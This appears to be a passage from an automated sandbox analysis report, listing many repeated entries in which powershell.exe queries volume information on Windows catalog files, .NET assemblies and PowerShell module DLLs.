Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
